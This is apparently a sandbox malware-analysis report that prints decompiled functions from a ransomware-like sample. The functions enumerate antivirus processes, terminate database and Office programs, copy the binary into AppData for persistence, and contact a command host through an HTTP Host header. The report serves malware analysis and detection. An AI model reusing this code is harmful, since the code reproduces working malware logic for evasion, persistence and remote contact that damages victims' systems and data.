				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F582F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F582C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F582D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F582F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F582F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F5830A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F582AD0(); // executed
				goto L5;
			}

APIs

Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F582E19
LoadCursorW.USER32(00000000,00007F00), ref: 0F582E2E
LoadIconW.USER32 ref: 0F582E59
RegisterClassExW.USER32 ref: 0F582E68
ExitThread.KERNEL32 ref: 0F582E75

Part of subcall function 0F582F50: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F582F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F582E81
CreateWindowExW.USER32 ref: 0F582EA7
SetWindowLongW.USER32 ref: 0F582EB4
ExitThread.KERNEL32 ref: 0F582EBF

Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F582FA8
Part of subcall function 0F582F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F582FCF
Part of subcall function 0F582F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F582FE3
Part of subcall function 0F582F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F582FFA

ExitThread.KERNEL32 ref: 0F582F3F

Part of subcall function 0F582AD0: VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0F582AEA
Part of subcall function 0F582AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
Part of subcall function 0F582AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
Part of subcall function 0F582AD0: ExitThread.KERNEL32 ref: 0F582C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F582EC8
UpdateWindow.USER32(00000000), ref: 0F582ECF
CreateThread.KERNEL32 ref: 0F582EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F05
TranslateMessage.USER32(?), ref: 0F582F1C
DispatchMessageW.USER32 ref: 0F582F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F37

Strings

s, xrefs: 0F582DB9
1, xrefs: 0F582D6F
win32app, xrefs: 0F582E51, 0F582EA0
s, xrefs: 0F582D7F
s, xrefs: 0F582D77
k, xrefs: 0F582D67
firefox, xrefs: 0F582E9B
d, xrefs: 0F582DA9
s, xrefs: 0F582DC1
f, xrefs: 0F582DA1
0, xrefs: 0F582DF1
w, xrefs: 0F582DB1

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
Instruction ID: 142506e2248bef634949804d404099a8f810a23c99f06cee0db32062ad680c9c
Opcode Fuzzy Hash: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
Instruction Fuzzy Hash: 27515E70648301AFE310AF618D49B5B7FE4BF44B55F10492DF684BA281E7B8A14BCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F588050 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F588050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0F587E40(_t64); // executed
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
					_t62 = _t41;
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f0070;
						_v52 = 0x69006c;
						_v48 = 0x690074;
						_v44 = 0x720061;
						_v40 = 0x6d006f;
						_v36 = 0x6e0061;
						_v32 = 0x2e0061;
						_v28 = 0x690062;
						_v24 = 0x74;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63); // executed
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t40;
				}
			}

APIs

InternetCloseHandle.WININET(?), ref: 0F588063
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
VirtualAlloc.KERNELBASE(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F587046,ipv4bot.whatismyipaddress.com,0F58FF90), ref: 0F5880AF
wsprintfW.USER32 ref: 0F5880C3
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F5880E1
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F58814E
HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F588165
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F588184
InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F5881B0
GetLastError.KERNEL32 ref: 0F5881BC
InternetCloseHandle.WININET(00000000), ref: 0F5881C9
InternetCloseHandle.WININET(00000000), ref: 0F5881CE
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F587046), ref: 0F5881DA

Strings

b, xrefs: 0F588140
a, xrefs: 0F588132
a, xrefs: 0F588139
s, xrefs: 0F588101
p, xrefs: 0F58810F
H, xrefs: 0F5880F8
t, xrefs: 0F588147
o, xrefs: 0F58812B
:, xrefs: 0F588108
HTTP/1.1, xrefs: 0F5880D7
a, xrefs: 0F588124
l, xrefs: 0F588116
t, xrefs: 0F58811D

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
API String ID: 3906118045-2187218134
Opcode ID: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
Instruction ID: fb9741fe322c9d45a71f587c5887f673f2e20cb36e725705d743cf1e3b9af782
Opcode Fuzzy Hash: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
Instruction Fuzzy Hash: 6341B430600208BBEB109F51DC48FEE7FB9FF04B55F504119F904B6281C7B99956DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0F587B70 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0F587B70(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t47;
				void* _t49;
				int _t50;
				WCHAR* _t56;
				int _t63;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t47 = VirtualAlloc(0, 4, 0x3000, 4); // executed
				_t75 = _t47;
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c; // executed
					_t49 = CreateToolhelp32Snapshot(2, 0); // executed
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						_t50 = Process32FirstW(_t49); // executed
						if(_t50 != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									_t63 = Process32NextW(_v20, _t75); // executed
									if(_t63 != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000); // executed
						FindCloseChangeNotification(_v20); // executed
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000); // executed
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0F587B8D
VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004), ref: 0F587C01
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0F587C16
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F587C2C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F587C4F
lstrcmpiW.KERNEL32(0F5903AC,-00000024), ref: 0F587C75
Process32NextW.KERNEL32(?,?), ref: 0F587CEE
GetLastError.KERNEL32 ref: 0F587CF8
lstrlenW.KERNEL32(00000000), ref: 0F587D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F587D3B
FindCloseChangeNotification.KERNELBASE(?), ref: 0F587D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0F587D55

Strings

i)w, xrefs: 0F587C75

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 1411803383-1280834553
Opcode ID: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
Instruction ID: bf7ffb222bc93faeca42814bda6c4ed375b14932ef22ecdb0bff7d343602f07c
Opcode Fuzzy Hash: d8c7260aa22c64026fed599107f84de27d6d1a74c7676b23f1435bed7ccf9877
Instruction Fuzzy Hash: 5851AE71900218EBCF149FA4E948BAE7FB4FF48725F20406AE505BB381C7746906DF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F582AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F582AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F5881F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F5882B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F5881F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F582890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F582960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0F582AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F582B7D

Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
Part of subcall function 0F5882B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F582B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F582BE4
lstrcatW.KERNEL32(00000000,?), ref: 0F582BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0F582BF4
wsprintfW.USER32 ref: 0F582C35
ExitThread.KERNEL32 ref: 0F582C47

Strings

U, xrefs: 0F582B75
P, xrefs: 0F582B55
"%s", xrefs: 0F582C2F
\Microsoft\, xrefs: 0F582BDE
AppData, xrefs: 0F582B97
.exe, xrefs: 0F582BEE
I, xrefs: 0F582B6C

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
Instruction ID: 771572041b1eb57703340caded6851e0109114bff87869e903ba5e3081b329f2
Opcode Fuzzy Hash: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
Instruction Fuzzy Hash: 5E419F71204311ABE304EF20DD49BAB7FD9BB88715F044439B545B6282DBBC990BCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F5848C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0F5848C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F584A32
VirtualAlloc.KERNELBASE(00000000,0000022C,00003000,00000004), ref: 0F584A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F584A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
CloseHandle.KERNEL32(00000000), ref: 0F584AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
FindCloseChangeNotification.KERNELBASE(?), ref: 0F584AEA

Strings

i)w, xrefs: 0F584A85

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3023235786-1280834553
Opcode ID: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
Instruction ID: a5e6a378b55c7ef619c32334364e3d2b63d1585fd9da39f2db305f325d105f33
Opcode Fuzzy Hash: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
Instruction Fuzzy Hash: D5515EB51083419FE320EF51954875BBFE4FBA9718F60492DE594BB252C734880BCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F5847D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
